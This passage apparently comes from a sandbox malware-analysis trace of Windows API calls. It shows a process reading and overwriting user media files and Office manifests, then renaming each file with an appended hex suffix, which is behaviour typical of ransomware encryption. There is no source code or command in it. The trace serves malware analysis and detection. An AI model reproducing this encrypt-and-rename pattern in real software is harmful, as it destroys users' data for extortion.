NtSetInformationFile (FileHandle=0x5c8, IoStatusBlock=0x708f9d4, FileInformation=0x74181c0, Length=0x13a, FileInformationClass=0xa) returned 0x0 [0168.298] CloseHandle (hObject=0x5c8) returned 1 [0168.299] GetProcessHeap () returned 0x270000 [0168.300] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76b8ef8 | out: hHeap=0x270000) returned 1 [0168.302] RtlInterlockedCompareExchange64 () returned 0x6 [0168.302] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.302] NtQueryObject (in: Handle=0x5c4, ObjectInformationClass=0x1, ObjectInformation=0x76e1100, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x76e1100, ReturnLength=0x708f9e4) returned 0x0 [0168.303] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\Rla0Af.jpg", lpString2=".803A669F3E24F0EAB16957AE1B8BC31AF2FD525A2E93A62E7FFC313D7B322464" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\Rla0Af.jpg.803A669F3E24F0EAB16957AE1B8BC31AF2FD525A2E93A62E7FFC313D7B322464") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\Rla0Af.jpg.803A669F3E24F0EAB16957AE1B8BC31AF2FD525A2E93A62E7FFC313D7B322464" [0168.303] GetProcessHeap () returned 0x270000 [0168.303] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x126) returned 0x4332920 [0168.303] NtSetInformationFile (FileHandle=0x5c4, IoStatusBlock=0x708f9d4, FileInformation=0x4332920, Length=0x126, FileInformationClass=0xa) returned 0x0 [0168.305] CloseHandle (hObject=0x5c4) returned 1 [0168.307] GetProcessHeap () returned 0x270000 [0168.308] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76e1050 | out: hHeap=0x270000) returned 1 [0168.310] RtlInterlockedCompareExchange64 () returned 0x5 [0168.310] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.310] NtQueryObject (in: Handle=0x5a8, ObjectInformationClass=0x1, ObjectInformation=0x7709258, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x7709258, ReturnLength=0x708f9e4) returned 0x0 [0168.311] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\zgyTqIKo7R9.gif", lpString2=".DB124129F02E5693F12DA8176356BFB3EE10162A467B3916B062E6F43BCF0A27" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\zgyTqIKo7R9.gif.DB124129F02E5693F12DA8176356BFB3EE10162A467B3916B062E6F43BCF0A27") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\zgyTqIKo7R9.gif.DB124129F02E5693F12DA8176356BFB3EE10162A467B3916B062E6F43BCF0A27" [0168.311] GetProcessHeap () returned 0x270000 [0168.311] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x130) returned 0x4332a58 [0168.311] NtSetInformationFile (FileHandle=0x5a8, IoStatusBlock=0x708f9d4, FileInformation=0x4332a58, Length=0x130, FileInformationClass=0xa) returned 0x0 [0168.313] CloseHandle (hObject=0x5a8) returned 1 [0168.313] GetProcessHeap () returned 0x270000 [0168.315] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x77091a8 | out: hHeap=0x270000) returned 1 [0168.315] RtlInterlockedCompareExchange64 () returned 0x4 [0168.315] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.315] NtQueryObject (in: Handle=0x594, ObjectInformationClass=0x1, ObjectInformation=0x77313b0, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x77313b0, ReturnLength=0x708f9e4) returned 0x0 [0168.318] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\zpD0p 1em-JOVM.gif", lpString2=".2E7ADFC8DC619314532D7E4DA7A57BEF85723E07037D370DC52B764DFAF7364D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\zpD0p 1em-JOVM.gif.2E7ADFC8DC619314532D7E4DA7A57BEF85723E07037D370DC52B764DFAF7364D") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\zpD0p 1em-JOVM.gif.2E7ADFC8DC619314532D7E4DA7A57BEF85723E07037D370DC52B764DFAF7364D" [0168.318] GetProcessHeap () returned 0x270000 [0168.318] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x136) returned 0x7418308 [0168.318] NtSetInformationFile (FileHandle=0x594, IoStatusBlock=0x708f9d4, FileInformation=0x7418308, Length=0x136, FileInformationClass=0xa) returned 0x0 [0168.321] CloseHandle (hObject=0x594) returned 1 [0168.322] GetProcessHeap () returned 0x270000 [0168.324] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7731300 | out: hHeap=0x270000) returned 1 [0168.331] RtlInterlockedCompareExchange64 () returned 0x3 [0168.331] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.331] NtQueryObject (in: Handle=0x4a8, ObjectInformationClass=0x1, ObjectInformation=0x7759508, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x7759508, ReturnLength=0x708f9e4) returned 0x0 [0168.332] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\7g14lH7VgBRylj.gif", lpString2=".BAA0FC1C67472868DA98846A58EADBC93EAF8306C798F0F32A1F2B7FB8260E26" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\7g14lH7VgBRylj.gif.BAA0FC1C67472868DA98846A58EADBC93EAF8306C798F0F32A1F2B7FB8260E26") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\7g14lH7VgBRylj.gif.BAA0FC1C67472868DA98846A58EADBC93EAF8306C798F0F32A1F2B7FB8260E26" [0168.332] GetProcessHeap () returned 0x270000 [0168.332] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x12c) returned 0x4332b90 [0168.333] NtSetInformationFile (FileHandle=0x4a8, IoStatusBlock=0x708f9d4, FileInformation=0x4332b90, Length=0x12c, FileInformationClass=0xa) returned 0x0 [0168.335] CloseHandle (hObject=0x4a8) returned 1 [0168.336] GetProcessHeap () returned 0x270000 [0168.338] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7759458 | out: hHeap=0x270000) returned 1 [0168.340] RtlInterlockedCompareExchange64 () returned 0x2 [0168.341] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.341] WriteFile (in: hFile=0x5e4, lpBuffer=0x7600180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75e0048 | out: lpBuffer=0x7600180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75e0048) returned 1 [0168.342] RtlInterlockedCompareExchange64 () returned 0x1 [0168.342] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.342] NtQueryObject (in: Handle=0x5e4, ObjectInformationClass=0x1, ObjectInformation=0x75e00f8, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x75e00f8, ReturnLength=0x708f9e4) returned 0x0 [0168.344] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\ud8n5jKw.m4a", lpString2=".3980C76C3A3A464114DC41E78D38BAAB1E6292553795014869F4468C62E4CF68" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\ud8n5jKw.m4a.3980C76C3A3A464114DC41E78D38BAAB1E6292553795014869F4468C62E4CF68") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\ud8n5jKw.m4a.3980C76C3A3A464114DC41E78D38BAAB1E6292553795014869F4468C62E4CF68" [0168.344] GetProcessHeap () returned 0x270000 [0168.344] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x126) returned 0x4332cc8 [0168.344] NtSetInformationFile (FileHandle=0x5e4, IoStatusBlock=0x708f9d4, FileInformation=0x4332cc8, Length=0x126, FileInformationClass=0xa) returned 0x0 [0168.346] CloseHandle (hObject=0x5e4) returned 1 [0168.346] GetProcessHeap () returned 0x270000 [0168.348] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0168.348] RtlInterlockedCompareExchange64 () returned 0x2 [0168.348] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.350] NtQueryObject (in: Handle=0x58c, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x74c20b8, ReturnLength=0x708f9e4) returned 0x0 [0168.351] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1\\RGmfEkC6DIb.wav", lpString2=".80AF20C815AAE61E0BB29A88B1B50DD3A123FCEDD31C803E8D1EB9F289D44B7E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1\\RGmfEkC6DIb.wav.80AF20C815AAE61E0BB29A88B1B50DD3A123FCEDD31C803E8D1EB9F289D44B7E") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1\\RGmfEkC6DIb.wav.80AF20C815AAE61E0BB29A88B1B50DD3A123FCEDD31C803E8D1EB9F289D44B7E" [0168.351] GetProcessHeap () returned 0x270000 [0168.351] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x150) returned 0x42fbb28 [0168.351] NtSetInformationFile (FileHandle=0x58c, IoStatusBlock=0x708f9d4, FileInformation=0x42fbb28, Length=0x150, FileInformationClass=0xa) returned 0x0 [0168.354] CloseHandle (hObject=0x58c) returned 1 [0168.355] GetProcessHeap () returned 0x270000 [0168.356] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0168.356] RtlInterlockedCompareExchange64 () returned 0x1 [0168.356] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0169.031] ReadFile (in: hFile=0x58c, lpBuffer=0x7492450, nNumberOfBytesToRead=0x4c00, lpNumberOfBytesRead=0x0, lpOverlapped=0x7472318 | out: lpBuffer=0x7492450*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7472318) returned 1 [0169.140] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0169.140] NtQueryObject (in: Handle=0x5dc, ObjectInformationClass=0x1, ObjectInformation=0x7659508, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x7659508, ReturnLength=0x708f9e4) returned 0x0 [0169.277] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama\\dXc8SgpPrc-ET AvuZ8.avi", lpString2=".35A8CF3D8EBB64D5611B89658A6B536B535E314DAFCF77B077E779354D39A467" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama\\dXc8SgpPrc-ET AvuZ8.avi.35A8CF3D8EBB64D5611B89658A6B536B535E314DAFCF77B077E779354D39A467") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama\\dXc8SgpPrc-ET AvuZ8.avi.35A8CF3D8EBB64D5611B89658A6B536B535E314DAFCF77B077E779354D39A467" [0169.277] GetProcessHeap () returned 0x270000 [0169.277] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x144) returned 0x42586c8 [0169.277] NtSetInformationFile (FileHandle=0x5dc, IoStatusBlock=0x708f9d4, FileInformation=0x42586c8, Length=0x144, FileInformationClass=0xa) returned 0x0 [0169.287] CloseHandle (hObject=0x5dc) returned 1 [0169.288] GetProcessHeap () returned 0x270000 [0169.290] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7659458 | out: hHeap=0x270000) returned 1 [0169.293] RtlInterlockedCompareExchange64 () returned 0x1 [0169.293] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0169.295] WriteFile (in: hFile=0x590, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0169.316] RtlInterlockedCompareExchange64 () returned 0xffffffff [0169.316] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0170.942] ReadFile (in: hFile=0x5dc, lpBuffer=0x7701188, nNumberOfBytesToRead=0x1800, lpNumberOfBytesRead=0x0, lpOverlapped=0x76e1050 | out: lpBuffer=0x7701188*, lpNumberOfBytesRead=0x0, lpOverlapped=0x76e1050) returned 1 [0170.956] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0170.957] WriteFile (in: hFile=0x58c, lpBuffer=0x752a588*, nNumberOfBytesToWrite=0x1800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x750a450 | out: lpBuffer=0x752a588*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x750a450) returned 1 [0170.959] RtlInterlockedCompareExchange64 () returned 0x0 [0170.959] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0171.606] ReadFile (in: hFile=0x58c, lpBuffer=0x7400180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0171.606] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0171.634] WriteFile (in: hFile=0x600, lpBuffer=0x7779140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7759008 | out: lpBuffer=0x7779140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7759008) returned 1 [0171.827] RtlInterlockedCompareExchange64 () returned 0x2 [0171.827] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0171.827] WriteFile (in: hFile=0x5f0, lpBuffer=0x75526e0*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75325a8 | out: lpBuffer=0x75526e0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75325a8) returned 1 [0171.837] RtlInterlockedCompareExchange64 () returned 0x8 [0171.837] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0172.016] NtQueryObject (in: Handle=0x5cc, ObjectInformationClass=0x1, ObjectInformation=0x78e9210, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x78e9210, ReturnLength=0x708f9e4) returned 0x0 [0172.017] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", lpString2=".D2BCFCB9903C6ECF75C44864222A4BCBEE77EDD52ED9BA8DF26B3EB58AD9F934" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.D2BCFCB9903C6ECF75C44864222A4BCBEE77EDD52ED9BA8DF26B3EB58AD9F934") returned="\\Device\\HarddiskVolume1\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.D2BCFCB9903C6ECF75C44864222A4BCBEE77EDD52ED9BA8DF26B3EB58AD9F934" [0172.017] GetProcessHeap () returned 0x270000 [0172.017] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x12c) returned 0x4333418 [0172.017] NtSetInformationFile (FileHandle=0x5cc, IoStatusBlock=0x708f9d4, FileInformation=0x4333418, Length=0x12c, FileInformationClass=0xa) returned 0x0 [0172.106] CloseHandle (hObject=0x5cc) returned 1 [0172.108] GetProcessHeap () returned 0x270000 [0172.110] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x78e9160 | out: hHeap=0x270000) returned 1 [0172.116] RtlInterlockedCompareExchange64 () returned 0x7 [0172.116] GetQueuedCompletionStatus (CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff) Thread: id = 107 os_tid = 0xae0 [0142.351] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0156.306] ReadFile (in: hFile=0x5a0, lpBuffer=0x750a298, nNumberOfBytesToRead=0x2a00, lpNumberOfBytesRead=0x0, lpOverlapped=0x74ea160 | out: lpBuffer=0x750a298*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74ea160) returned 1 [0156.306] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0156.317] WriteFile (in: hFile=0x5a0, lpBuffer=0x750a298*, nNumberOfBytesToWrite=0x2a00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74ea160 | out: lpBuffer=0x750a298*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74ea160) returned 1 [0156.318] RtlInterlockedCompareExchange64 () returned 0x1 [0156.318] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0156.358] NtQueryObject (in: Handle=0x5a0, ObjectInformationClass=0x1, ObjectInformation=0x74ea210, ObjectInformationLength=0x10004, ReturnLength=0x702fa7c | out: ObjectInformation=0x74ea210, ReturnLength=0x702fa7c) returned 0x0 [0156.359] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmmui.msi.16.en-us.xml", lpString2=".5715D7DADDEACB778C52C73CF0FF1147E3573A45063BADC2D3F779E16D112233" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmmui.msi.16.en-us.xml.5715D7DADDEACB778C52C73CF0FF1147E3573A45063BADC2D3F779E16D112233") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmmui.msi.16.en-us.xml.5715D7DADDEACB778C52C73CF0FF1147E3573A45063BADC2D3F779E16D112233" [0156.359] GetProcessHeap () returned 0x270000 [0156.359] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x19a) returned 0x42465c0 [0156.359] NtSetInformationFile (FileHandle=0x5a0, IoStatusBlock=0x702fa6c, FileInformation=0x42465c0, Length=0x19a, FileInformationClass=0xa) returned 0x0 [0156.361] CloseHandle (hObject=0x5a0) returned 1 [0156.364] GetProcessHeap () returned 0x270000 [0156.366] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74ea160 | out: hHeap=0x270000) returned 1 [0156.372] RtlInterlockedCompareExchange64 () returned 0x4 [0156.372] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0156.512] ReadFile (in: hFile=0x5a0, lpBuffer=0x7492450, nNumberOfBytesToRead=0x600, lpNumberOfBytesRead=0x0, lpOverlapped=0x7472318 | out: lpBuffer=0x7492450*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7472318) returned 1 [0156.526] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0156.607] WriteFile (in: hFile=0x5a0, lpBuffer=0x7600180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75e0048 | out: lpBuffer=0x7600180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75e0048) returned 1 [0156.608] RtlInterlockedCompareExchange64 () returned 0x0 [0156.608] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0156.622] WriteFile (in: hFile=0x5a0, lpBuffer=0x7600180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75e0048 | out: lpBuffer=0x7600180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75e0048) returned 1 [0156.624] RtlInterlockedCompareExchange64 () returned 0x0 [0156.624] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0156.654] WriteFile (in: hFile=0x598, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0xc00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0156.655] RtlInterlockedCompareExchange64 () returned 0x0 [0156.655] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0156.655] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x702fa7c | out: ObjectInformation=0x74c20b8, ReturnLength=0x702fa7c) returned 0x0 [0156.656] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml", lpString2=".0967090834C1D346BAE9CA70EEF3F6F1EC53AA5FEEB217FA77F77D6252E2D60E" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml.0967090834C1D346BAE9CA70EEF3F6F1EC53AA5FEEB217FA77F77D6252E2D60E") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml.0967090834C1D346BAE9CA70EEF3F6F1EC53AA5FEEB217FA77F77D6252E2D60E" [0156.656] GetProcessHeap () returned 0x270000 [0156.656] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1b8) returned 0x42fc9f8 [0156.656] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x702fa6c, FileInformation=0x42fc9f8, Length=0x1b8, FileInformationClass=0xa) returned 0x0 [0156.658] CloseHandle (hObject=0x598) returned 1 [0156.661] GetProcessHeap () returned 0x270000 [0156.663] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0156.663] RtlInterlockedCompareExchange64 () returned 0x1 [0156.663] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: 